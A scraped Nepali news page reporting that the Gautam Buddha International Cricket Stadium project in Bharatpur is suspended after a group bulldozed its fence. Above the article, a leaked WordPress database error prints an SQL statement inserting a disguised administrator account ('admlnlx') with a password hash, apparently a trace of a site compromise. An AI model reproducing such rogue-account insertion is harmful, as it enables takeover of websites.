WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$Bfu99JF/lwN1up/zyKnV35.FvIt56M/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-28 13:26:12', '', 'admlnlx', 'admlnlx')


Warning: Trying to access array offset on value of type bool in /home/gaulekhabar.com/public_html/wp-content/themes/nepali-news-portal/header.php on line 21
गौतम बुद्ध अन्तर्राष्ट्रिय रंगशाला परियोजना स्थगित – Gaule Khabar

गौतम बुद्ध अन्तर्राष्ट्रिय रंगशाला परियोजना स्थगित

गौतम बुद्ध अन्तर्राष्ट्रिय रंगशाला परियोजना स्थगित

गाउँले न्यूज, जेठ १६- धुर्मुस सुन्तली फाउन्डेसनको संयोजकत्वमा भरतपुरमा निर्माण हुन लागेको गौतम बुद्ध अन्तर्राष्ट्रिय क्रिकेट रंगशालाको कार्य स्थगित गरिएको छ । बिहीबार एक विज्ञप्ति जारी गरी फाउन्डेसनका अध्यक्ष सिताराम कट्टेलले कार्य अगाडि बढाउने वातावरण नभएसम्मको लागि निर्माणको सम्पूर्ण कार्य स्थगित गरिएको जानकारी दिएका छन् ।

“केही उत्शृंखल समूहबाट रंगशाला परियोजनाको पश्चिमतर्फको अस्थायी बारबेरमा अराजकीय तरिकाबाट डोजर प्रयोग गरि तहसनहस बनाई ठूलो क्षति पुर्‍याइएको प्रति हामी सम्पूर्ण सरोकारवाला निकाय तथा व्यक्तिहरूमा ध्यानाकर्षण गराउदै जो जसबाट यस्ता अवान्छनीय गतिविधि भए सोको भर्त्सना गर्दछौं ।”, विज्ञप्तिमा भनिएको छ । बुधबार बिहान रंगशाला निर्माणप्रति असन्तुष्ट समूहले डोजर चलाइ रंगशालाको क्षेत्रलाई बारिएको बार भत्काएको थियो ।

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका